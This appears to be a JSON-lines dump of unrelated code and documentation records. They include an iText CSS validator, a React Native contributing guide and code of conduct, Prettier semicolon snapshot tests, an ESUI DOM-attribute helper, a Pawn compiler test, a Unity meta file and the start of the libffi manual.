mandatory as soon as you\ndevelop commercial activities involving the iText software without\ndisclosing the source code of your own applications.\nThese activities include: offering paid services to customers as an ASP,\nserving PDFs on the fly in a web application, shipping iText with a closed\nsource product.\n\nFor more information, please contact iText Software Corp. at this\naddress: sales@itextpdf.com\n*/\nusing System.Collections.Generic;\nusing iText.IO.Util;\nusing iText.StyledXmlParser.Css;\nusing iText.StyledXmlParser.Css.Validate;\n\nnamespace iText.StyledXmlParser.Css.Validate.Impl.Declaration {\n /// \n /// \n /// implementation in case multiple types have to be checked.\n /// \n public class MultiTypeDeclarationValidator : ICssDeclarationValidator {\n /// The allowed data types.\n private IList allowedTypes;\n\n /// \n /// Creates a new\n /// \n /// instance.\n /// \n /// the allowed types\n public MultiTypeDeclarationValidator(params ICssDataTypeValidator[] allowedTypes) {\n this.allowedTypes = JavaUtil.ArraysAsList(allowedTypes);\n }\n\n /* (non-Javadoc)\n * @see com.itextpdf.styledxmlparser.css.validate.ICssDeclarationValidator#isValid(com.itextpdf.styledxmlparser.css.CssDeclaration)\n */\n public virtual bool IsValid(CssDeclaration cssDeclaration) {\n foreach (ICssDataTypeValidator dTypeValidator in allowedTypes) {\n if (dTypeValidator.IsValid(cssDeclaration.GetExpression())) {\n return true;\n }\n }\n return false;\n }\n }\n}\n"} {"text": "# Contributing\n\nWe want this community to be friendly and respectful to each other. Please follow it in all your interactions with the project.\n\n## Development workflow\n\nTo get started with the project, run `yarn bootstrap` in the root directory to install the required dependencies for each package:\n\n```sh\nyarn bootstrap\n```\n\nWhile developing, you can run the [example app](/example/) to test your changes.\n\nTo start the packager:\n\n```sh\nyarn example start\n```\n\nTo run the example app on Android:\n\n```sh\nyarn example android\n```\n\nTo run the example app on iOS:\n\n```sh\nyarn example android\n```\n\nMake sure your code passes TypeScript and ESLint. Run the following to verify:\n\n```sh\nyarn typescript\nyarn lint\n```\n\nTo fix formatting errors, run the following:\n\n```sh\nyarn lint --fix\n```\n\nRemember to add tests for your change if possible. 
Run the unit tests by:\n\n```sh\nyarn test\n```\n\n### Commit message convention\n\nWe follow the [conventional commits specification](https://www.conventionalcommits.org/en) for our commit messages:\n\n- `fix`: bug fixes, e.g. fix crash due to deprecated method.\n- `feat`: new features, e.g. add new method to the module.\n- `refactor`: code refactor, e.g. migrate from class components to hooks.\n- `docs`: changes into documentation, e.g. add usage example for the module..\n- `test`: adding or updating tests, eg add integration tests using detox.\n- `chore`: tooling changes, e.g. change CI config.\n\nOur pre-commit hooks verify that your commit message matches this format when committing.\n\n### Linting and tests\n\n[ESLint](https://eslint.org/), [Prettier](https://prettier.io/), [TypeScript](https://www.typescriptlang.org/)\n\nWe use [TypeScript](https://www.typescriptlang.org/) for type checking, [ESLint](https://eslint.org/) with [Prettier](https://prettier.io/) for linting and formatting the code, and [Jest](https://jestjs.io/) for testing.\n\nOur pre-commit hooks verify that the linter and tests pass when committing.\n\n### Scripts\n\nThe `package.json` file contains various scripts for common tasks:\n\n- `yarn bootstrap`: setup project by installing all dependencies and pods.\n- `yarn typescript`: type-check files with TypeScript.\n- `yarn lint`: lint files with ESLint.\n- `yarn test`: run unit tests with Jest.\n- `yarn example start`: start the Metro server for the example app.\n- `yarn example android`: run the example app on Android.\n- `yarn example ios`: run the example app on iOS.\n\n### Sending a pull request\n\n> **Working on your first pull request?** You can learn how from this _free_ series: [How to Contribute to an Open Source Project on GitHub](https://egghead.io/series/how-to-contribute-to-an-open-source-project-on-github).\n\nWhen you're sending a pull request:\n\n- Prefer small pull requests focused on one change.\n- Verify that linters and tests are passing.\n- Review the documentation to make sure it looks good.\n- Follow the pull request template when opening a pull request.\n- For pull requests that change the API or implementation, discuss with maintainers first by opening an issue.\n\n## Code of Conduct\n\n### Our Pledge\n\nWe as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.\n\nWe pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community.\n\n### Our Standards\n\nExamples of behavior that contributes to a positive environment for our community include:\n\n- Demonstrating empathy and kindness toward other people\n- Being respectful of differing opinions, viewpoints, and experiences\n- Giving and gracefully accepting constructive feedback\n- Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience\n- Focusing on what is best not just for us as individuals, but for the overall community\n\nExamples of unacceptable behavior include:\n\n- The use of sexualized language or imagery, and sexual attention or\n advances of any kind\n- Trolling, insulting or derogatory comments, and personal or political attacks\n- Public or 
private harassment\n- Publishing others' private information, such as a physical or email\n address, without their explicit permission\n- Other conduct which could reasonably be considered inappropriate in a\n professional setting\n\n### Enforcement Responsibilities\n\nCommunity leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful.\n\nCommunity leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate.\n\n### Scope\n\nThis Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces. Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event.\n\n### Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at [INSERT CONTACT METHOD]. All complaints will be reviewed and investigated promptly and fairly.\n\nAll community leaders are obligated to respect the privacy and security of the reporter of any incident.\n\n### Enforcement Guidelines\n\nCommunity leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct:\n\n#### 1. Correction\n\n**Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community.\n\n**Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested.\n\n#### 2. Warning\n\n**Community Impact**: A violation through a single incident or series of actions.\n\n**Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban.\n\n#### 3. Temporary Ban\n\n**Community Impact**: A serious violation of community standards, including sustained inappropriate behavior.\n\n**Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban.\n\n#### 4. 
Permanent Ban\n\n**Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals.\n\n**Consequence**: A permanent ban from any sort of public interaction within the community.\n\n### Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 2.0,\navailable at https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.\n\nCommunity Impact Guidelines were inspired by [Mozilla's code of conduct enforcement ladder](https://github.com/mozilla/diversity).\n\n[homepage]: https://www.contributor-covenant.org\n\nFor answers to common questions about this code of conduct, see the FAQ at\nhttps://www.contributor-covenant.org/faq. Translations are available at https://www.contributor-covenant.org/translations.\n"} {"text": " 8486, 'status' => 'C', 'lower' => array(969)); /* OHM SIGN */\n$config['2100_214f'][] = array('upper' => 8490, 'status' => 'C', 'lower' => array(107)); /* KELVIN SIGN */\n$config['2100_214f'][] = array('upper' => 8491, 'status' => 'C', 'lower' => array(229)); /* ANGSTROM SIGN */\n$config['2100_214f'][] = array('upper' => 8498, 'status' => 'C', 'lower' => array(8526)); /* TURNED CAPITAL F */\n"} {"text": " {}; // The semicolon is *not* necessary\n x(){}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x(){}\n}\nclass C4 {\n set = () => {}; // The semicolon is *not* necessary\n x(){}\n}\n\n\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1\n}\n\n=====================================output=====================================\n// TODO: upgrade parser\n// class A {\n// async; // The semicolon is *not* necessary\n// x(){}\n// }\n// class B {\n// static; // The semicolon *is* necessary\n// x(){}\n// }\n\nclass C1 {\n get; // The semicolon *is* necessary\n x() {}\n}\nclass C2 {\n get = () => {} // The semicolon is *not* necessary\n x() {}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x() {}\n}\nclass C4 {\n set = () => {} // The semicolon is *not* necessary\n x() {}\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1\n get [\"y\"]() {}\n\n a = 1\n static [\"y\"]() {}\n\n a = 1\n set [\"z\"](z) {}\n\n a = 1\n async [\"a\"]() {}\n\n a = 1\n async *g() {}\n\n a = 0\n b = 1\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0\n\n // none of the 
semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1\n get [\"y\"]() {}\n\n a = 1\n static [\"y\"]() {}\n\n a = 1\n set [\"z\"](z) {}\n\n a = 1\n async [\"a\"]() {}\n\n a = 1\n async *g() {}\n\n a = 0\n b = 1\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1\n}\n\n================================================================================\n`;\n\nexports[`class.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\n// TODO: upgrade parser\n// class A {\n// async; // The semicolon is *not* necessary\n// x(){}\n// }\n// class B {\n// static; // The semicolon *is* necessary\n// x(){}\n// }\n\nclass C1 {\n get; // The semicolon *is* necessary\n x(){}\n}\nclass C2 {\n get = () => {}; // The semicolon is *not* necessary\n x(){}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x(){}\n}\nclass C4 {\n set = () => {}; // The semicolon is *not* necessary\n x(){}\n}\n\n\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1\n}\n\n=====================================output=====================================\n// TODO: upgrade parser\n// class A {\n// async; // The semicolon is *not* necessary\n// x(){}\n// }\n// class B {\n// static; // The semicolon *is* necessary\n// x(){}\n// }\n\nclass C1 {\n get; // The semicolon *is* necessary\n x() {}\n}\nclass C2 {\n get = () => {}; // The semicolon is *not* necessary\n x() {}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x() {}\n}\nclass C4 {\n set = () => {}; // The semicolon is *not* necessary\n x() {}\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0;\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1;\n get [\"y\"]() {}\n\n a = 1;\n static [\"y\"]() {}\n\n a = 1;\n set [\"z\"](z) {}\n\n a = 1;\n async [\"a\"]() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0;\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1;\n get [\"y\"]() {}\n\n a = 1;\n static [\"y\"]() {}\n\n a = 1;\n set [\"z\"](z) {}\n\n a = 
1;\n async [\"a\"]() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1;\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1;\n}\n\n================================================================================\n`;\n\nexports[`comments.js - {\"semi\":false} format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\nsemi: false\n | printWidth\n=====================================input======================================\nlet error = new Error(response.statusText);\n// comment\n[].response = response\n\nx;\n\n/* comment */ [].response = response\n\nx;\n\n[].response = response; /* comment */\n\n=====================================output=====================================\nlet error = new Error(response.statusText)\n// comment\n;[].response = response\n\nx\n\n/* comment */ ;[].response = response\n\nx\n\n;[].response = response /* comment */\n\n================================================================================\n`;\n\nexports[`comments.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\nlet error = new Error(response.statusText);\n// comment\n[].response = response\n\nx;\n\n/* comment */ [].response = response\n\nx;\n\n[].response = response; /* comment */\n\n=====================================output=====================================\nlet error = new Error(response.statusText);\n// comment\n[].response = response;\n\nx;\n\n/* comment */ [].response = response;\n\nx;\n\n[].response = response; /* comment */\n\n================================================================================\n`;\n\nexports[`issue2006.js - {\"semi\":false} format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\nsemi: false\n | printWidth\n=====================================input======================================\nswitch (n) {\n case 11:\n var c = a.e;\n (i.a += Ga(c.e)), F(i, c.i, 0);\n}\n\nvar c = a.e;\n(i.a += Ga(c.e)), F(i, c.i, 0);\n\n=====================================output=====================================\nswitch (n) {\n case 11:\n var c = a.e\n ;(i.a += Ga(c.e)), F(i, c.i, 0)\n}\n\nvar c = a.e\n;(i.a += Ga(c.e)), F(i, c.i, 0)\n\n================================================================================\n`;\n\nexports[`issue2006.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\nswitch (n) {\n case 11:\n var c = a.e;\n (i.a += Ga(c.e)), F(i, c.i, 0);\n}\n\nvar c = a.e;\n(i.a += Ga(c.e)), F(i, c.i, 0);\n\n=====================================output=====================================\nswitch (n) {\n case 11:\n var c = a.e;\n (i.a += Ga(c.e)), F(i, c.i, 0);\n}\n\nvar c = a.e;\n(i.a += Ga(c.e)), F(i, c.i, 0);\n\n================================================================================\n`;\n\nexports[`no-semi.js - {\"semi\":false} format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\nsemi: false\n | 
printWidth\n=====================================input======================================\n\n// with preexisting semi\n\nx; [1, 2, 3].forEach(fn)\nx; [a, b, ...c] = [1, 2]\nx; /r/i.test('r')\nx; +1\nx; - 1\nx; ('h' + 'i').repeat(10)\nx; (1, 2)\nx; (() => {})()\nx; ({ a: 1 }).entries()\nx; ({ a: 1 }).entries()\nx; \nx; \\`string\\`\nx; (x, y) => x\n\n// doesn't have to be preceded by a semicolon\n\nclass X {} [1, 2, 3].forEach(fn)\n\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})()\n\n\n// check indentation\n\nif (true) {\n x; (() => {})()\n}\n\n// check statement clauses\n\ndo break; while (false)\nif (true) do break; while (false)\n\nif (true) 1; else 2\nfor (;;) ;\nfor (x of y) ;\n\ndebugger\n\n// check that it doesn't break non-ASI\n\n1\n- 1\n\n1\n+ 1\n\n1\n/ 1\n\narr\n[0]\n\nfn\n(x)\n\n!1\n\n1\n< 1\n\ntag\n\\`string\\`\n\nx; x => x\n\nx; (a || b).c++\n\nx; ++(a || b).c\n\nwhile (false)\n (function(){}())\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c)\n\n=====================================output=====================================\n// with preexisting semi\n\nx\n;[1, 2, 3].forEach(fn)\nx\n;[a, b, ...c] = [1, 2]\nx\n;/r/i.test(\"r\")\nx\n;+1\nx\n;-1\nx\n;(\"h\" + \"i\").repeat(10)\nx\n1, 2\nx\n;(() => {})()\nx\n;({ a: 1 }.entries())\nx\n;({ a: 1 }.entries())\nx\n;\nx\n;\\`string\\`\nx\n;(x, y) => x\n\n// doesn't have to be preceded by a semicolon\n\nclass X {}\n;[1, 2, 3].forEach(fn)\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})()\n\n// check indentation\n\nif (true) {\n x\n ;(() => {})()\n}\n\n// check statement clauses\n\ndo break\nwhile (false)\nif (true)\n do break\n while (false)\n\nif (true) 1\nelse 2\nfor (;;);\nfor (x of y);\n\ndebugger\n\n// check that it doesn't break non-ASI\n\n1 - 1\n\n1 + 1\n\n1 / 1\n\narr[0]\n\nfn(x)\n\n!1\n\n1 < 1\n\ntag\\`string\\`\n\nx\n;(x) => x\n\nx\n;(a || b).c++\n\nx\n++(a || b).c\n\nwhile (false) (function () {})()\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c)\n\n================================================================================\n`;\n\nexports[`no-semi.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\n\n// with preexisting semi\n\nx; [1, 2, 3].forEach(fn)\nx; [a, b, ...c] = [1, 2]\nx; /r/i.test('r')\nx; +1\nx; - 1\nx; ('h' + 'i').repeat(10)\nx; (1, 2)\nx; (() => {})()\nx; ({ a: 1 }).entries()\nx; ({ a: 1 }).entries()\nx; \nx; \\`string\\`\nx; (x, y) => x\n\n// doesn't have to be preceded by a semicolon\n\nclass X {} [1, 2, 3].forEach(fn)\n\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})()\n\n\n// check indentation\n\nif (true) {\n x; (() => {})()\n}\n\n// check statement clauses\n\ndo break; while (false)\nif (true) do break; while (false)\n\nif (true) 1; else 2\nfor (;;) ;\nfor (x of y) ;\n\ndebugger\n\n// check that it doesn't break non-ASI\n\n1\n- 1\n\n1\n+ 1\n\n1\n/ 1\n\narr\n[0]\n\nfn\n(x)\n\n!1\n\n1\n< 1\n\ntag\n\\`string\\`\n\nx; x => x\n\nx; (a || b).c++\n\nx; ++(a || b).c\n\nwhile (false)\n (function(){}())\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c)\n\n=====================================output=====================================\n// with preexisting semi\n\nx;\n[1, 2, 3].forEach(fn);\nx;\n[a, b, ...c] = [1, 
2];\nx;\n/r/i.test(\"r\");\nx;\n+1;\nx;\n-1;\nx;\n(\"h\" + \"i\").repeat(10);\nx;\n1, 2;\nx;\n(() => {})();\nx;\n({ a: 1 }.entries());\nx;\n({ a: 1 }.entries());\nx;\n;\nx;\n\\`string\\`;\nx;\n(x, y) => x;\n\n// doesn't have to be preceded by a semicolon\n\nclass X {}\n[1, 2, 3].forEach(fn);\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})();\n\n// check indentation\n\nif (true) {\n x;\n (() => {})();\n}\n\n// check statement clauses\n\ndo break;\nwhile (false);\nif (true)\n do break;\n while (false);\n\nif (true) 1;\nelse 2;\nfor (;;);\nfor (x of y);\n\ndebugger;\n\n// check that it doesn't break non-ASI\n\n1 - 1;\n\n1 + 1;\n\n1 / 1;\n\narr[0];\n\nfn(x);\n\n!1;\n\n1 < 1;\n\ntag\\`string\\`;\n\nx;\n(x) => x;\n\nx;\n(a || b).c++;\n\nx;\n++(a || b).c;\n\nwhile (false) (function () {})();\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c);\n\n================================================================================\n`;\n"} {"text": "/**\n * ESUI (Enterprise Simple UI library)\n * Copyright 2013 Baidu Inc. All rights reserved.\n *\n * @ignore\n * @file DOM属性相关基础库\n * @author otakustay\n */\n define(\n function (require) {\n var dom = require('./dom');\n\n /**\n * @override lib\n */\n var lib = {};\n\n /**\n * 检查元素是否有指定的属性\n *\n * @param {HTMLElement} element 指定元素\n * @param {string} name 指定属性名称\n * @return {boolean}\n */\n lib.hasAttribute = function (element, name) {\n if (element.hasAttribute) {\n return element.hasAttribute(name);\n }\n else {\n return element.attributes\n && element.attributes[name]\n && element.attributes[name].specified;\n }\n };\n\n // 提供给 setAttribute 与 getAttribute 方法作名称转换使用\n var ATTRIBUTE_NAME_MAPPING = (function () {\n var result = {\n cellpadding: 'cellPadding',\n cellspacing: 'cellSpacing',\n colspan: 'colSpan',\n rowspan: 'rowSpan',\n valign: 'vAlign',\n usemap: 'useMap',\n frameborder: 'frameBorder'\n };\n\n var div = document.createElement('div');\n div.innerHTML = '';\n var label = div.getElementsByTagName('label')[0];\n\n if (label.getAttribute('className') === 'test') {\n result['class'] = 'className';\n }\n else {\n result.className = 'class';\n }\n\n if (label.getAttribute('for') === 'test') {\n result.htmlFor = 'for';\n }\n else {\n result['for'] = 'htmlFor';\n }\n\n return result;\n }());\n\n\n /**\n * 设置元素属性,会对某些值做转换\n *\n * @param {HTMLElement | string} element 目标元素或其id\n * @param {string} key 要设置的属性名\n * @param {string} value 要设置的属性值\n * @return {HTMLElement} 目标元素\n */\n lib.setAttribute = function (element, key, value) {\n element = dom.g(element);\n\n if (key === 'style') {\n element.style.cssText = value;\n }\n else {\n key = ATTRIBUTE_NAME_MAPPING[key] || key;\n element.setAttribute(key, value);\n }\n\n return element;\n };\n\n /**\n * 获取目标元素的属性值\n *\n * @param {HTMLElement | string} element 目标元素或其id\n * @param {string} key 要获取的属性名称\n * @return {string | null} 目标元素的attribute值,获取不到时返回 null\n */\n lib.getAttribute = function (element, key) {\n element = dom.g(element);\n\n if (key === 'style') {\n return element.style.cssText;\n }\n\n key = ATTRIBUTE_NAME_MAPPING[key] || key;\n return element.getAttribute(key);\n };\n\n /**\n * 移除元素属性\n *\n * @param {HTMLElement | string} element 目标元素或其id\n * @param {string} key 属性名称\n */\n lib.removeAttribute = function (element, key) {\n element = dom.g(element);\n\n key = ATTRIBUTE_NAME_MAPPING[key] || key;\n element.removeAttribute(key);\n };\n\n return lib;\n }\n);\n"} {"text": "{\n 'test_type': 'output_check',\n 'errors': 
\"\"\"\n__emit_p6.pwn(23) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(24) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(25) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(26) : error 033: array must be indexed (variable \"local_refarray\")\n__emit_p6.pwn(45) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(46) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(47) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(48) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(49) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(50) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(51) : error 033: array must be indexed (variable \"local_refarray\")\n__emit_p6.pwn(71) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(72) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(73) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(74) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(75) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(76) : error 033: array must be indexed (variable \"local_refarray\")\n__emit_p6.pwn(98) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(99) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(100) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(101) : error 033: array must be indexed (variable \"local_refarray\")\n\"\"\"\n}\n"} {"text": "
\n"} {"text": "fileFormatVersion: 2\nguid: a5ebb11c6fc3a2f498bd89593f7744aa\nMonoImporter:\n externalObjects: {}\n serializedVersion: 2\n defaultReferences: []\n executionOrder: 0\n icon: {instanceID: 0}\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "\\input texinfo @c -*-texinfo-*-\n@c %**start of header\n@setfilename libffi.info\n@settitle libffi\n@setchapternewpage off\n@c %**end of header\n\n@c Merge the standard indexes into a single one.\n@syncodeindex fn cp\n@syncodeindex vr cp\n@syncodeindex ky cp\n@syncodeindex pg cp\n@syncodeindex tp cp\n\n@include version.texi\n\n@copying\n\nThis manual is for Libffi, a portable foreign-function interface\nlibrary.\n\nCopyright @copyright{} 2008, 2010, 2011 Red Hat, Inc.\n\n@quotation\nPermission is granted to copy, distribute and/or modify this document\nunder the terms of the GNU General Public License as published by the\nFree Software Foundation; either version 2, or (at your option) any\nlater version. A copy of the license is included in the\nsection entitled ``GNU General Public License''.\n\n@end quotation\n@end copying\n\n@dircategory Development\n@direntry\n* libffi: (libffi). Portable foreign-function interface library.\n@end direntry\n\n@titlepage\n@title Libffi\n@page\n@vskip 0pt plus 1filll\n@insertcopying\n@end titlepage\n\n\n@ifnottex\n@node Top\n@top libffi\n\n@insertcopying\n\n@menu\n* Introduction:: What is libffi?\n* Using libffi:: How to use libffi.\n* Missing Features:: Things libffi can't do.\n* Index:: Index.\n@end menu\n\n@end ifnottex\n\n\n@node Introduction\n@chapter What is libffi?\n\nCompilers for high level languages generate code that follow certain\nconventions. These conventions are necessary, in part, for separate\ncompilation to work. One such convention is the @dfn{calling\nconvention}. The calling convention is a set of assumptions made by\nthe compiler about where function arguments will be found on entry to\na function. A calling convention also specifies where the return\nvalue for a function is found. The calling convention is also\nsometimes called the @dfn{ABI} or @dfn{Application Binary Interface}.\n@cindex calling convention\n@cindex ABI\n@cindex Application Binary Interface\n\nSome programs may not know at the time of compilation what arguments\nare to be passed to a function. For instance, an interpreter may be\ntold at run-time about the number and types of arguments used to call\na given function. @samp{Libffi} can be used in such programs to\nprovide a bridge from the interpreter program to compiled code.\n\nThe @samp{libffi} library provides a portable, high level programming\ninterface to various calling conventions. This allows a programmer to\ncall any function specified by a call interface description at run\ntime.\n\n@acronym{FFI} stands for Foreign Function Interface. A foreign\nfunction interface is the popular name for the interface that allows\ncode written in one language to call code written in another language.\nThe @samp{libffi} library really only provides the lowest, machine\ndependent layer of a fully featured foreign function interface. 
A\nlayer must exist above @samp{libffi} that handles type conversions for\nvalues passed between the two languages.\n@cindex FFI\n@cindex Foreign Function Interface\n\n\n@node Using libffi\n@chapter Using libffi\n\n@menu\n* The Basics:: The basic libffi API.\n* Simple Example:: A simple example.\n* Types:: libffi type descriptions.\n* Multiple ABIs:: Different passing styles on one platform.\n* The Closure API:: Writing a generic function.\n* Closure Example:: A closure example.\n@end menu\n\n\n@node The Basics\n@section The Basics\n\n@samp{Libffi} assumes that you have a pointer to the function you wish\nto call and that you know the number and types of arguments to pass\nit, as well as the return type of the function.\n\nThe first thing you must do is create an @code{ffi_cif} object that\nmatches the signature of the function you wish to call. This is a\nseparate step because it is common to make multiple calls using a\nsingle @code{ffi_cif}. The @dfn{cif} in @code{ffi_cif} stands for\nCall InterFace. To prepare a call interface object, use the function\n@code{ffi_prep_cif}.\n@cindex cif\n\n@findex ffi_prep_cif\n@defun ffi_status ffi_prep_cif (ffi_cif *@var{cif}, ffi_abi @var{abi}, unsigned int @var{nargs}, ffi_type *@var{rtype}, ffi_type **@var{argtypes})\nThis initializes @var{cif} according to the given parameters.\n\n@var{abi} is the ABI to use; normally @code{FFI_DEFAULT_ABI} is what\nyou want. @ref{Multiple ABIs} for more information.\n\n@var{nargs} is the number of arguments that this function accepts.\n\n@var{rtype} is a pointer to an @code{ffi_type} structure that\ndescribes the return type of the function. @xref{Types}.\n\n@var{argtypes} is a vector of @code{ffi_type} pointers.\n@var{argtypes} must have @var{nargs} elements. If @var{nargs} is 0,\nthis argument is ignored.\n\n@code{ffi_prep_cif} returns a @code{libffi} status code, of type\n@code{ffi_status}. This will be either @code{FFI_OK} if everything\nworked properly; @code{FFI_BAD_TYPEDEF} if one of the @code{ffi_type}\nobjects is incorrect; or @code{FFI_BAD_ABI} if the @var{abi} parameter\nis invalid.\n@end defun\n\nIf the function being called is variadic (varargs) then\n@code{ffi_prep_cif_var} must be used instead of @code{ffi_prep_cif}.\n\n@findex 